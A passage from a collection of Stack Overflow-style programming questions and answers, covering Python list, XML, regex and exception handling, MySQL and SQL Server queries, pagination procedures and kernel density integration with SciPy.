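    sent = ET.SubElement(chapter, "SENT", ID=parts[2])
    word = ET.SubElement(sent, "WORD", ID=parts[3])
    word.text = parts[4]

xml_text = ET.tostring(library, encoding="unicode")
assert xml_text.count("<BOOK") == 5
assert '<WORD ID="1">the</WORD>' in xml_text
```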
I don't have that much experience with lxml, so there may be more elegant solutions, but both of these work. | Here is a suggestion that uses lxml (tested with Python 2.7). The code can easily be adapted to work with ElementTree too, but it's harder to get nice pretty-printed output (see <https://stackoverflow.com/a/16377996/407651> for some more on this).
The input file is library.txt and the output file is library.xml.
```
from lxml import etree
lines = open("library.txt").readlines()
library = etree.Element('LIBRARY') # The root element
# For each line with data in the input file, create a BOOK/CHAPTER/SENT/WORD structure
for line in lines:
values = line.split(',')
if len(values) == 5:
book = etree.SubElement(library, "BOOK")
book.set("ID", values[0])
chapter = etree.SubElement(book, "CHAPTER")
chapter.set("ID", values[1])
sent = etree.SubElement(chapter, "SENT")
sent.set("ID", values[2])
word = etree.SubElement(sent, "WORD")
word.set("ID", values[3])
word.text = values[4].strip()
etree.ElementTree(library).write("library.xml", pretty_print=True)
``` | creating a xml file with For Loop in python | [
"",
"python",
"xml",
"elementtree",
""
] |
I am working with a database that stores dates in multiple fields as integers (mock field names):
* Century: CC01: 20
* Year: YR01: 13
* Month: MO01: 7
* Day: DY01: 22
I can formulate a date as so: `DATE((CC01 * 100 + YR01) || '-' || MO01 || '-' || DY01)`
The problem is when I need to filter over a range of dates. For example, if I want to select the past 90 days, I could write something like this...
`WHERE DATE((CC01 * 100 + YR01) || '-' || MO01 || '-' || DY01) >= CURRENT DATE - 90 DAYS`
The problem here is performance. I am searching for an efficient way of writing this formula that keeps functions limited to the right-hand side of the equation.
Here is an example that would work with today's date (I don't need to worry about century, and I am leaving out some detail):
`WHERE CC01 = 20 AND YR01 >= RIGHT(YEAR(CURRENT DATE - 7 DAYS),2) AND MO01 >= MONTH(CURRENT DATE - 7 DAYS) AND DY01 >= DAY(CURRENT DATE - 7 DAYS)`
This only works because going back 7 days keeps us in the current month and year. I would also prefer not to have a huge set of ANDs and ORs (if possible). | I believe I may have found a solution.
```
CC01 = 20
AND
YR01 >= RIGHT(YEAR(CURRENT DATE - 220 DAYS),2)
AND NOT
(
YR01 = RIGHT(YEAR(CURRENT DATE - 220 DAYS),2)
AND
MO01 = MONTH(CURRENT DATE - 220 DAYS)
AND
DY01 < DAY(CURRENT DATE - 220 DAYS)
)
AND NOT
(
YR01 = RIGHT(YEAR(CURRENT DATE - 220 DAYS),2)
AND
MO01 < MONTH(CURRENT DATE - 220 DAYS)
)
``` | Do you have access to modify the DB schema?
If so, you could consider a 'generated column' for the date:
<https://www.ibm.com/developerworks/community/blogs/SQLTips4DB2LUW/entry/expression_generated_columns?lang=en> | Filter by date range when the date is split into multiple fields | [
"",
"sql",
"db2",
""
] |
I have a 2D list in Python:
```
list = [[9, 2, 7], [9, 7], [2, 7], [1, 0], [0, 5, 4]]
```
I would like to get the union of list items if any intersection occurs. For example, `[9, 2, 7]`, `[9, 7]`, and `[2, 7]` have an intersection of more than one digit. The union of these would be `[9,2,7]`.
How can I get the final list as follows in an efficient way?
```
finalList = [[9,2,7], [0, 1, 5, 4]]
```
*N.B. order of numbers is not important.* | You have a graph problem. You want to build connected components in a graph whose vertices are elements of your sublists, and where two vertices have an edge between them if they're elements of the same sublist. You could build an adjacency-list representation of your input and run a graph search algorithm over it, or you could iterate over your input and build disjoint sets. Here's a slightly-modified connected components algorithm I wrote up for [a similar question](https://stackoverflow.com/questions/17482944/find-duplicate-items-within-a-list-of-list-of-tuples-python/17483756#17483756):
```
import collections
# build an adjacency list representation of your input
graph = collections.defaultdict(set)
for l in input_list:
if l:
first = l[0]
for element in l:
graph[first].add(element)
graph[element].add(first)
# breadth-first search the graph to produce the output
output = []
marked = set() # a set of all nodes whose connected component is known
for node in graph:
if node not in marked:
# this node is not in any previously seen connected component
# run a breadth-first search to determine its connected component
frontier = set([node])
connected_component = []
while frontier:
marked |= frontier
connected_component.extend(frontier)
# find all unmarked nodes directly connected to frontier nodes
# they will form the new frontier
new_frontier = set()
for node in frontier:
new_frontier |= graph[node] - marked
frontier = new_frontier
output.append(tuple(connected_component))
``` | Here is a theoretical answer: This is a **connected component** problem: you build a graph as follows:
* there is a vertex for each set in the list
* there is an edge between two sets when they have a common value.
what you want is the union of the [connected components](http://en.wikipedia.org/wiki/Connected_component_%28graph_theory%29) of the graph. | How can i get union of 2D list items when there occurs any intersection (in efficient way)? | [
"",
"python",
"list",
"set",
"intersection",
""
] |
## The goal
Convert `99999999` into `99999-999`.
## The problem
I do not know the syntax.
## What I already thought about
I was thinking of using the `FORMAT()` function, but I'm working with *INT* instead of *DECIMAL*.
## My query
```
Select city.ZipCode As zipCode
From app_cities As city
Where city.Id = 1
```
So, that's it. Someone has any idea to me? | The problem you're going to have with zip codes is that there can be a leading 0. So the length of the zip code can either be 7 or 8 digits.
So, the zipcode might be 02323-213 or 12133-333. As an int, you will lose the first digit.
Taking what Jurgen D already posted and modifying it.
```
SELECT insert(LPAD(zipcode, 8, '0'), 6, 0, '-') from zipcodes;
```
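Outside the database the same fix-up is simple (Python sketch):

```python
def format_zip(zipcode):
    # left-pad to 8 digits to restore a leading zero lost in an INT column,
    # then insert the dash before the last three digits
    s = "%08d" % zipcode
    return s[:5] + "-" + s[5:]

assert format_zip(99999999) == "99999-999"
assert format_zip(2323213) == "02323-213"
```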
[SQL Fiddle](http://www.sqlfiddle.com/#!2/2e255/1) | Use [INSERT()](http://dev.mysql.com/doc/refman/5.0/en/string-functions.html#function_insert)
```
select insert(ZipCode , 6, 0, '-') As zipCode
from app_cities As city
where Id = 1
```
## [SQLFiddle demo](http://sqlfiddle.com/#!2/d41d8/16786) | Make a simple format (MySQL) | [
"",
"mysql",
"sql",
""
] |
I followed this to pass functions as arguments:
[Passing functions with arguments to another function in Python?](https://stackoverflow.com/questions/803616/passing-functions-with-arguments-to-another-function-in-python)
However, I could not figure out how to pass a function with its own arguments as named parameters.
```
def retry(func, *args):
func(*args)
def action(args):
do something
retry(action, arg1, namedArg=arg2)
```
Here I get an exception:
```
TypeError: retry() got an unexpected keyword argument 'namedArg'
```
Normally, I can do:
```
action(arg1, namedArg=arg2)
```
Please help/ | `*args` and it's sibling `**kwargs` are the names generally used for extra arguments and key word arguments. You are passing a kew word argument when you pass `namedArg=arg2`.
So, try this instead:
```
def retry(func, *args, **kwargs):
func(*args, **kwargs)
def action(*args, **kwargs):
do something
retry(action, arg1, namedArg=arg2)
```
If you instead use
```
def action(args, kwargs):
do something
```
Then you will end up with `args` as a tuple of positional arguments and `kwargs` as a dictionary of keyword arguments, so in your case
```
args = (arg1,)
kwargs = {'namedArg':arg2}
``` | Read this, [keyword arguments in python doc](http://docs.python.org/2/tutorial/controlflow.html#keyword-arguments).
As the error clearly states, you `got an unexpected keyword argument 'namedArg'`, whereas you are providing only positional arguments via `*args`.
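For instance, a minimal sketch of the distinction (the function names mirror the question; the return values are just for illustration):

```python
def retry(func, *args, **kwargs):
    # *args collects positional arguments, **kwargs collects keyword arguments.
    return func(*args, **kwargs)

def action(arg1, namedArg=None):
    return (arg1, namedArg)

print(retry(action, 1, namedArg=2))  # (1, 2)
```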
You will find plenty of examples to understand keyword arguments. | passing functions as argument with named parameters | [
"",
"python",
""
] |
I'm trying to get a subset of data based on the latest id and dates. It seems that when selecting other fields in the table they are not in sync with the max id and dates returned.
Any idea how I can fix this?
MySQL:
```
SELECT MAX(m.id) as id, m.sender_id, m.receiver_id, MAX(m.date) as date, m.content, l.username, p.gender
FROM messages m
LEFT JOIN login_users l on l.user_id = m.sender_id
LEFT JOIN profiles p ON p.user_id = l.user_id
WHERE m.receiver_id=3
GROUP BY m.sender_id ORDER BY date DESC LIMIT 0, 7
```
The data for content isn't the correct one. It seems to be returning random content and not the content that is tied to the row for max id and max date.
Do I need to do some sort of sub select to fix this? | To answer the question in the title, "Why doesn't my content field match my MAX(id) field", that's because there is no guarantee that the values returned for the non-aggregate fields will be from the row where the MAX value is found. This is the documented behavior, and this is what we expect.
Other DBMSs would throw an error on the statement; MySQL is just more lax, and you are getting values from one row, but it's not guaranteed to be the row that either of the MAX values (id or date) is found on.
You have two separate aggregate expressions, `MAX(m.id)` and `MAX(m.date)`. Note that there is no guarantee that those values will come from the same row.
The rule in other databases is that every non-aggregate expression in the SELECT list needs to appear in the GROUP BY. (MySQL is more lax about that, and doesn't make that a requirement.)
One way to "fix" the query so that it does return values from the row with the MAX value is to use an inline view (query) that gets the `MAX(id)` grouped by what you want to GROUP BY, and then a JOIN back to the original table to get other values on the row.
From your statement it's not clear what result set you want returned. If you want the row that has the maximum id and you also want the row with the maximum date, then you could do something like this:
```
SELECT m.id
, m.sender_id
, m.receiver_id
, m.date
, m.content
, l.username
, p.gender
FROM ( SELECT t.sender_id
, t.receiver_id
, MAX(t.id) AS max_id
, MAX(t.date) AS max_date
FROM messages t
WHERE t.receiver_id=3
GROUP
BY t.sender_id
, t.receiver_id
) s
JOIN messages m
ON m.sender_id = s.sender_id
AND m.receiver_id = s.receiver_id
AND ( m.id = s.max_id OR m.date = s.max_date)
LEFT
JOIN login_users l on l.user_id = m.sender_id
LEFT
JOIN profiles p ON p.user_id = l.user_id
ORDER BY m.date DESC LIMIT 0, 7
```
The inline view aliased as "s" returns the max values, and then that gets joined back to the messages table, aliased as "m".
**NOTE**
In most cases, we find that a `JOIN (query)` will perform better than an `IN (query)`, because of the different access plans. You can see the difference in plans with an EXPLAIN.
For performance, you'll want an index
```
... ON messages (`receiver_id`, `sender_id`, `id`, `date`)
```
There's an equality predicate on receiver\_id, so that should be the leading column, to get a range scan (instead of a full scan). You want the `sender_id` column next, because that should allow MySQL to avoid a "Using filesort" operation to get the rows grouped. The `id` and `date` columns are included, so that the inline view query can be satisfied entirely from the index pages without a need to access the pages in the table. (The EXPLAIN should show "`Using where; Using index`".)
That same index should also be suitable for the outer query, though it does need to access the "`content`" column from the table pages, so the EXPLAIN will not show "Using index" for that step. (It's likely that the "`content`" column is much longer than we would want in the index.) | Well, you *could* probably solve it without a subselect, but doing one is fairly straightforward. Something like this should work: just make the subselect return the ids of the interesting rows in messages, and get the data for only them.
```
SELECT m.id as id, m.sender_id, m.receiver_id, m.date as date,
m.content, l.username, p.gender
FROM messages m
LEFT JOIN login_users l on l.user_id = m.sender_id
LEFT JOIN profiles p ON p.user_id = l.user_id
WHERE m.id IN (
SELECT max(id) FROM messages
WHERE receiver_id=3
GROUP BY sender_id
)
ORDER BY date DESC
LIMIT 0, 7
```
The reason that your original query does not match up fields is that `GROUP BY` really requires aggregate functions (like MAX/MIN/SUM/...) applied to every field you select that's not grouped by. The reason the query even runs is that MySQL does not enforce that, but instead returns indeterminate fields from any row that is matching. Afaik, all other SQL RDBMS' refuse to run the query.
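If you would rather have MySQL enforce the standard behaviour and reject such queries outright, you can enable the `ONLY_FULL_GROUP_BY` SQL mode (a session-level example; adjust for your setup):

```
-- With this mode enabled, selecting a non-aggregated column that is not
-- in the GROUP BY raises an error instead of returning indeterminate values.
SET SESSION sql_mode = CONCAT(@@sql_mode, ',ONLY_FULL_GROUP_BY');
```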
EDIT: As for performance, a few indexes that are likely to help are;
```
CREATE INDEX ix_inner ON messages(receiver_id, sender_id, id);
CREATE INDEX ix_login_users ON login_users(user_id);
CREATE INDEX ix_profiles ON profiles(user_id);
``` | Why doesn't my content field match my MAX(id) field in MySQL? | [
"",
"mysql",
"sql",
""
] |
This is a fairly simple question, but I am looking for the most Pythonic method of doing it. I have two lists:
```
a = [..., 5, 7, 4, 8]
b = [a, b, c, d]
```
I need to combine these two lists, overwriting the last 3 numbers of list `a`, such that it produces the following list:
```
c = [..., 5, a, b, c, d]
```
The `...` represent a varying length set of numbers, so ideally the method to do this would use a reference from the end of the list rather than the start (i.e. something along the lines of `a[-3]` rather than `a[27]`).
I have tried various `for` loops to cycle through the lists until it reaches the correct point, but this seems highly inefficient and I'm sure there must be a cleaner way of doing it.
Thanks for your help, much appreciated. | If you need a *new* list, use slicing and concatenation:
```
c = a[:-3] + b
```
Python slice notation allows for *negative* indices, interpreted as relative to the length of the list. `[:-3]` is the same as `[0:len(a) - 3]`; slicing everything but the last three elements.
You can also alter `a` in-place by assigning to a slice:
```
a[-3:] = b
```
replaces the last 3 elements of `a` with all elements of `b`. | First of all, I'd save the value 3 as a constant (to avoid magic numbers).
Then I'd simply use:
```
NUMBER_FROM_END = 3
c = a[:-NUMBER_FROM_END] + b
``` | Python: Combine two lists, overwriting the final few lines of the first list | [
"",
"python",
"list",
"concatenation",
""
] |
I'm aware that it's possible to ignore exceptions in Python using try...except statements. Is it possible to ignore exceptions in Python when they occur, but still print them?
I tried ignoring the exception here, and therefore, the exception was not printed when it was encountered:
```
try:
num = 0
if num == 0:
raise Exception("Num must not be 0!")
except Exception:
pass
'''The exception is ignored, and is not printed.'''
```
I've written a simple source-to-source compiler that has a lot of exceptions like these, and I'm not sure how I can ignore the exceptions while still printing them. How can I ensure that the exceptions are printed to the console even when they are being ignored? | You can print an exception like this.
```
try:
x = 1 / 0
except Exception as e:
print e
```
**EDIT:**
As user1354557, gcbirzan, and Jonathan Vanasco pointed out, you can use the [`traceback`](http://docs.python.org/2/library/traceback.html) and [`logging`](http://docs.python.org/2/library/logging.html) modules to get more precise error messages. Error messages printed out these ways will be more verbose, which is (usually) a good thing.
```
import traceback
try:
x = 1 / 0
except Exception as e:
print traceback.format_exc() # I prefer this to traceback.print_exc()
import logging
try:
x = 1 / 0
except Exception as e:
logging.exception(e)
``` | If you want a printout of the stack trace, you can use the [`traceback`](http://docs.python.org/2/library/traceback.html) module:
```
import traceback
try:
0/0
except:
traceback.print_exc()
```
This would print something like:
```
Traceback (most recent call last):
File "example.py", line 3, in <module>
0/0
ZeroDivisionError: integer division or modulo by zero
```
Is this what you're looking for? | In Python, is it possible to print exceptions even when they are being ignored? | [
"",
"python",
""
] |
I want to match IP range using a Python regex.
For Ex. the google bot IP range as follow
66.249.64.0 - 66.249.95.255
```
re.compile(r"66.249.\d{1,3}\.\d{1,3}$")
```
I can not figure out how to do this? I found [this](https://stackoverflow.com/questions/15525974/regex-to-match-an-ip-range) one done using Java. | You can use this:
```
re.compile(r"66\.249\.(?:6[4-9]|[78]\d|9[0-5])\.\d{1,3}$")
```
If you are motivated, you can replace `\d{1,3}` with:
```
(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)
```
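Putting the pieces together, here is a quick sanity check in Python (the sample addresses are illustrative):

```python
import re

# Third octet restricted to 64-95, last octet checked as a full 0-255 octet.
pattern = re.compile(r"66\.249\.(?:6[4-9]|[78]\d|9[0-5])\.(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)$")

print(bool(pattern.match("66.249.64.0")))    # True
print(bool(pattern.match("66.249.95.255")))  # True
print(bool(pattern.match("66.249.96.0")))    # False
```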
Explanation:
A regex engine doesn't know what a numeric range is. The only way to describe a range is to write all the possibilities with alternations:
```
6[4-9] | [78][0-9] | 9[0-5]
6 can be followed by 4 to 9 --> 64 to 69
7 or 8 can be followed by 0 to 9 --> 70 to 89
9 can be followed by 0 to 5 --> 90 to 95
``` | Use `socket.inet_aton`:
```
import socket
ip_min, ip_max = socket.inet_aton('66.249.64.0'), socket.inet_aton('66.249.95.255')
if ip_min <= socket.inet_aton('66.249.63.0') <= ip_max:
#do stuff here
``` | Python regex to match IP range | [
"",
"python",
"regex",
"ip",
""
] |
I have been attempting to follow a [**tutorial**](http://pyopengl.sourceforge.net/context/tutorials/shader_1.xhtml) online and I have followed every single line and for some reason I get the following error:
```
Traceback (most recent call last):
File "C:/Users/User/Desktop/OpenGLContextTest.py", line 2, in <module>
from OpenGLContext import testingcontext
File "C:\Python27\lib\site-packages\openglcontext-2.2.0a2-py2.7.egg\OpenGLContext\testingcontext.py", line 10, in <module>
from OpenGLContext import plugins, context, contextdefinition
File "C:\Python27\lib\site-packages\openglcontext-2.2.0a2-py2.7.egg\OpenGLContext\context.py", line 32, in <module>
from OpenGLContext import visitor, texturecache,plugins
File "C:\Python27\lib\site-packages\openglcontext-2.2.0a2-py2.7.egg\OpenGLContext\visitor.py", line 3, in <module>
from OpenGLContext.scenegraph import nodepath
File "C:\Python27\lib\site-packages\openglcontext-2.2.0a2-py2.7.egg\OpenGLContext\scenegraph\nodepath.py", line 3, in <module>
from vrml.vrml97 import nodepath, nodetypes
File "C:\Python27\lib\site-packages\pyvrml97-2.3.0a2-py2.7.egg\vrml\vrml97\nodepath.py", line 4, in <module>
from vrml import nodepath
File "C:\Python27\lib\site-packages\pyvrml97-2.3.0a2-py2.7.egg\vrml\nodepath.py", line 3, in <module>
from vrml import node, weaklist
File "C:\Python27\lib\site-packages\pyvrml97-2.3.0a2-py2.7.egg\vrml\node.py", line 6, in <module>
from vrml import field, fieldtypes, weaklist, weakkeydictfix
File "C:\Python27\lib\site-packages\pyvrml97-2.3.0a2-py2.7.egg\vrml\field.py", line 2, in <module>
from pydispatch import dispatcher, robustapply
ImportError: No module named pydispatch
```
I have attempted searching on google for the chance that this tutorial may be broken or something, but I don't believe it is. I have pydispatch and have attempted to install it using `easy_install` yet nothing changes. Can someone please help me with this? I know the code is completely correct as after a while I copied and pasted everything to ensure that it wasn't my syntax. | The instructions (apparently incorrectly) say to install `pydispatcher`. I had the same problem you did until I installed the module `PyDispatcher`. Confusingly, both exist. | To clarify on @Phil's answer.
I saw:
`No module named pydispatch`
And so I did:
`sudo pip install pydispatch`
The install worked, but Scrapy still didn't work because we were supposed to:
`sudo pip install pydispatcher` | No Module Named pydispatch when using pyOpenGL | [
"",
"python",
"pyopengl",
""
] |
I've a text file (say test.txt) e.g.
```
a ......
aa ......
a+a .....
aa+ .....
a+ .....
aaa .....
.........
```
Now I would like to find the line number of any particular strings e.g. 'a', 'aa+' etc. I've tried to find an exact match of the input string using regex.
```
name='a'
import re
p = re.compile(r'\b'+re.escape(name)+ r'\b')
i=0
with open('test.txt') as inpfile:
for num, line in enumerate(inpfile):
if p.search(line):
print num
```
The program should print "0" only, but it's printing 0, 2, 4.
My expected output is
```
name='a'
```
output: 0
```
name='aa'
```
output: 1
```
name='aa+'
```
output: 3 and so on...
I understand that the regular expression I used above is not correct. It would be helpful if you could share comments/suggestions on how to write the regular expression so that it gives the desired output for all the patterns.
Thanks. | Why would it *not* print 2 and 4? `a+a` and `a+` both contain `a` surrounded by word boundaries, exactly as you have specified with `\b`. Perhaps you want to match the start and end of the line instead? E.g.
```
name='a'
import re
p = re.compile('^'+re.escape(name)+ '$')
with open('test.txt') as inpfile:
for num, line in enumerate(inpfile):
        if p.search(line.rstrip('\n')):
print num
```
But if you're looking to match the line exactly, why go to the trouble of using a regular expression?
```
name='a'
with open('test.txt') as inpfile:
for num, line in enumerate(inpfile):
        if name == line.rstrip('\n'):
print num
``` | The problem is the exact meaning of your regular expression. In lay terms, you are matching the expression:
"word border" followed by an 'a' followed by another "word border"
and that is why it matches lines 0 (`a`), 2 (`a+a`) and so on.
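A quick check confirms this (the sample lines mirror the question's file):

```python
import re

p = re.compile(r'\ba\b')
lines = ['a .....', 'aa .....', 'a+a .....', 'aa+ .....', 'a+ .....']
for num, line in enumerate(lines):
    if p.search(line):
        print(num)  # prints 0, 2 and 4, one per line
```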
Here, spaces, non-printable characters (start of line, end of line) and '+' all mark the end of a word. | python regex with variable input | [
"",
"python",
"regex",
""
] |
I have a .txt file with the following lines in it:
```
23;Pablo;SanJose
45;Rose;Makati
```
I have this program:
```
file = open("C:/Users/renato/Desktop/HTML Files/myfile2.txt")
def query(id):
for line in file:
table = {}
(table["ID"],table["name"],table["city"]) = line.split(";")
if id == int(table["ID"]):
file.close()
return table
else:
file.close()
return {}
id = int(input("Enter the ID of the user: "))
table2 = query(id)
print("ID: "+table2["ID"])
print("Name: "+table2["name"])
print("City: "+table2["city"])
```
So what's happening (according to me) is:
File is opened
A hash called `table` is created and each line of the file is split into 3 keys/values.
If the `id` entered by the user matches the value of the key `ID`, then close the file
and return the whole hash.
Then, I'm assigning `table2` the values on the `table` hash and I'm trying to print the values in it.
When I run this, I get the following:
```
Traceback (most recent call last):
File "C:/Users/renato/Desktop/HTML Files/Python/hash2.py", line 17, in <module>
print("ID: "+table2["ID"])
KeyError: 'ID'
```
It seems like it's not recognizing the key `ID` on the `table2` var. I also tried declaring `table2` as a hash by putting `table2 = {}` before the function is executed, but it continues to display the error message.
How do I assign the values of a returned hash to a variable, so that I can print them using their `keys`? | What's going on is that you're returning right after the first line of the file doesn't match the id you're looking for. You have to do this:
```
def query(id):
for line in file:
table = {}
(table["ID"],table["name"],table["city"]) = line.split(";")
if id == int(table["ID"]):
file.close()
return table
# ID not found; close file and return empty dict
file.close()
return {}
``` | ```
def query(id):
for line in file:
table = line.split(";")
if id == int(table[0]):
yield table
id = int(input("Enter the ID of the user: "))
for id_, name, city in query(id):
print("ID: " + id_)
print("Name: " + name)
print("City: " + city)
file.close()
```
Using `yield`. | How to return a dictionary | Python | [
"",
"python",
"python-3.x",
""
] |
I am new to Python. I need to know how to convert a list of integers to a list of strings. So,
```
>>>list=[1,2,3,4]
```
I want to convert that list to this:
```
>>>print (list)
['1','2','3','4']
```
Also, can I add a list of strings to make it look something like this?
```
1234
You can use a *list comprehension*:
```
>>> my_list = [1, 2, 3, 4]
>>> [str(v) for v in my_list]
['1', '2', '3', '4']
```
or [*`map()`*](http://docs.python.org/2/library/functions.html#map):
```
>>> str_list = map(str, my_list)
>>> str_list
['1', '2', '3', '4']
```
In Python 3, you would need to use - `list(map(str, my_list))`
For the 2nd part, you can use `join()`:
```
>>> ''.join(str_list)
'1234'
```
And please don't name your *list* `list`. It shadows the built-in `list`. | ```
>>>l=[1,2,3,4]
```
I've modified your example to not use the name `list` -- it shadows the actual builtin `list`, which will cause mysterious failures.
Here's how you make it into a list of strings:
```
l = [str(n) for n in l]
```
And here's how you make them all abut one another:
```
all_together = ''.join(l)
``` | Converting an integer list into a string list | [
"",
"python",
"python-3.3",
""
] |
I have a table with many integers in column named 'data'
```
data | param
123 1
432 1
123 1
423 2
234 1
423 2
```
I have a query
```
SELECT data FROM data_table WHERE param=*something* GROUP BY data
ORDER BY rand() LIMIT 1
```
That returns a random distinct integer from the table. But I also need to get the total number of integers that I was choosing from. I tried:
```
SELECT DISTINCT(data) AS data, COUNT(DISTINCT(data)) as count FROM
data_table WHERE param=*something* ORDER BY rand() LIMIT 1
```
This returns the correct number of rows that the data was chosen from, but the *data* returned is not random - it is always the same row. So I need to get the number of rows that rand() selected from after the WHERE was applied. Making a query on the above table should return:
```
query WHERE param='1':
data count
123 3
query WHERE param='1':
data count
432 3
query WHERE param='1':
data count
234 3
query WHERE param='2':
data count
423 1
``` | This works. I normally don't recommend putting a subquery in the select list, because it is evaluated for each row returned. However, in this case you are only returning one row, so it is OK.
```
select
count(distinct data) as cnt,
(SELECT data FROM data_table
 WHERE param='xxx'
 GROUP BY data
ORDER BY rand() LIMIT 1) as random
from data_table
WHERE param='xxx'
```
See this [SQL Fiddle](http://www.sqlfiddle.com/#!2/d0fa0/6) to see it work without the where statements. | I think the easiest is to join another select statement to get the total number of rows and add that to your main SELECT statement.
```
SELECT data AS data, count.count
FROM data
JOIN (SELECT COUNT(DISTINCT(data)) AS count FROM data WHERE parameter = "test") AS count
WHERE parameter = "test"
ORDER BY rand()
LIMIT 1;
```
[Here's a SQL Fiddle](http://sqlfiddle.com/#!2/58dab/1) | Count distinct elements and return only one | [
"",
"mysql",
"sql",
""
] |
My requirement is to compare the data of two tables within one database and store the uncommon data in a separate table, named relation data, in the same database.
How can I compare these tables' data?
Are there any tools to do the comparison, and can we store the uncommon data in a separate table using such a tool?
I forgot to mention one thing: the two tables hold the same data but have different column names. For example, the first table has 20 columns and the second table has 50 columns, but 4 of those columns hold matching data, with a different number of rows and different column names in each table. Based on matching the data in these columns, I need to find the rows and store them in another table | Try this query, I think it works
```
insert into relational(r1,r2,r3,....rn)
(select s1,s2,s3,...sn from
information info where info.informationcity not in (select customercity from customer)
and info.informationstate not in (select customerstate from customer) )
``` | As an alternative to writing a SQL script, you could copy the entire results from both tables to a .csv file and then use win merge to compare the two:
<http://winmerge.org/downloads/>
I have used this technique in the past when comparing mass amounts of data and it has worked quite well. | Compare data between two tables with in single database | [
"",
"sql",
"sql-server",
"sql-server-2008",
""
] |
I am trying to add a sorting feature to my pagination stored procedure.
How can I do this? So far I have created the procedure below. It works fine, but when I pass the `@sort` parameter, the sorting doesn't work.
```
ALTER PROCEDURE [dbo].[sp_Mk]
@page INT,
@size INT,
@sort nvarchar(50) ,
@totalrow INT OUTPUT
AS
BEGIN
DECLARE @offset INT
DECLARE @newsize INT
IF(@page=0)
begin
SET @offset = @page;
SET @newsize = @size
end
ELSE
begin
SET @offset = @page+1;
SET @newsize = @size-1
end
-- SET NOCOUNT ON added to prevent extra result sets from
SET NOCOUNT ON;
WITH OrderedSet AS
(
SELECT *,
ROW_NUMBER() OVER (ORDER BY @sort DESC) AS 'Index'
FROM [dbo].[Mk]
)
SELECT *
FROM OrderedSet
WHERE [Index] BETWEEN @offset AND (@offset + @newsize)
SET @totalrow = (SELECT COUNT(*) FROM [dbo].[Mk])
END
``` | One way (possibly not the best) to do it is to use dynamic SQL
```
CREATE PROCEDURE [sp_Mk]
@page INT,
@size INT,
@sort nvarchar(50) ,
@totalrow INT OUTPUT
AS
BEGIN
DECLARE @offset INT
DECLARE @newsize INT
DECLARE @sql NVARCHAR(MAX)
IF(@page=0)
BEGIN
SET @offset = @page
SET @newsize = @size
END
ELSE
BEGIN
SET @offset = @page*@size
SET @newsize = @size-1
END
SET NOCOUNT ON
SET @sql = '
WITH OrderedSet AS
(
SELECT *, ROW_NUMBER() OVER (ORDER BY ' + @sort + ') AS ''Index''
FROM [dbo].[Mk]
)
SELECT * FROM OrderedSet WHERE [Index] BETWEEN ' + CONVERT(NVARCHAR(12), @offset) + ' AND ' + CONVERT(NVARCHAR(12), (@offset + @newsize))
EXECUTE (@sql)
SET @totalrow = (SELECT COUNT(*) FROM [Mk])
END
```
Here is **[SQLFiddle](http://sqlfiddle.com/#!3/6b4a0/4)** demo | I'm adding an answer since so many of the other answers suggest dynamic SQL, which is not a best practice. You can add pagination using an `OFFSET-FETCH` clause, which provides you with an option to fetch only a window or page of results from a result set.
**Note**: `OFFSET-FETCH` can be used only with the `ORDER BY` clause.
Example:
```
SELECT [First Name] + ' ' + [Last Name] FROM Employees
ORDER BY [First Name]
OFFSET 10 ROWS FETCH NEXT 5 ROWS ONLY;
```
If you put it in a stored procedure
```
CREATE PROCEDURE [dbo].[uspEmployees_GetAll]
@rowOffset int = 0,
@fetchNextRows int = 100
AS
BEGIN
SELECT * FROM Employees
ORDER BY ID desc
OFFSET @rowOffset ROWS FETCH NEXT @fetchNextRows ROWS ONLY;
END
```
You can call it like this
```
DECLARE @rowOffset int
DECLARE @fetchNextRows int
EXECUTE [dbo].[uspEmployees_GetAll]
@rowOffset = 0,
@fetchNextRows = 30
``` | Pagination with the stored procedure | [
"",
"sql",
"sql-server",
"t-sql",
"stored-procedures",
""
] |
I have a `x,y` distribution of points for which I obtain the `KDE` through [scipy.stats.gaussian\_kde](http://docs.scipy.org/doc/scipy/reference/generated/scipy.stats.gaussian_kde.html). This is my code and how the output looks (the `x,y` data can be obtained from [here](http://pastebin.com/RXbHzGfV)):
```
import numpy as np
from scipy import stats
# Obtain data from file.
data = np.loadtxt('data.dat', unpack=True)
m1, m2 = data[0], data[1]
xmin, xmax = min(m1), max(m1)
ymin, ymax = min(m2), max(m2)
# Perform a kernel density estimate (KDE) on the data
x, y = np.mgrid[xmin:xmax:100j, ymin:ymax:100j]
positions = np.vstack([x.ravel(), y.ravel()])
values = np.vstack([m1, m2])
kernel = stats.gaussian_kde(values)
f = np.reshape(kernel(positions).T, x.shape)
# Define the number that will determine the integration limits
x1, y1 = 2.5, 1.5
# Perform integration?
# Plot the results:
import matplotlib.pyplot as plt
# Set limits
plt.xlim(xmin,xmax)
plt.ylim(ymin,ymax)
# KDE density plot
plt.imshow(np.rot90(f), cmap=plt.cm.gist_earth_r, extent=[xmin, xmax, ymin, ymax])
# Draw contour lines
cset = plt.contour(x,y,f)
plt.clabel(cset, inline=1, fontsize=10)
plt.colorbar()
# Plot point
plt.scatter(x1, y1, c='r', s=35)
plt.show()
```

The red point with coordinates `(x1, y1)` has (like every point in the 2D plot) an associated value given by `f` (the kernel or `KDE`) between 0 and 0.42. Let's say that `f(x1, y1) = 0.08`.
I need to integrate `f` with integration limits in `x` and `y` given by those regions where `f` evaluates to *less* than `f(x1, y1)`, ie: `f(x, y)<0.08`.
From what I've seen, `python` can perform numerical integration of *functions* and one-dimensional arrays, but I haven't seen anything that would let me perform a numerical integration on a 2D array (the `f` kernel). Furthermore, I'm not sure how I would even recognize the regions given by that particular condition (ie: `f(x, y)` less than a given value)
Can this be done at all? | Here is a way to do it using monte carlo integration. It is a little slow, and there is randomness in the solution. The error is inversely proportional to the square root of the sample size, while the running time is directly proportional to the sample size (where sample size refers to the monte carlo sample (10000 in my example below), not the size of your data set). Here is some simple code using your `kernel` object.
```
#Compute the point below which to integrate
iso = kernel((x1,y1))
#Sample from your KDE distribution
sample = kernel.resample(size=10000)
#Filter the sample
insample = kernel(sample) < iso
#The integral you want is equivalent to the probability of drawing a point
#that gets through the filter
integral = insample.sum() / float(insample.shape[0])
print integral
```
I get approximately 0.2 as the answer for your data set. | Currently, it is available
`kernel.integrate_box([-np.inf,-np.inf], [2.5,1.5])` | Integrate 2D kernel density estimate | [
"",
"python",
"integration",
"kernel-density",
"probability-density",
""
] |
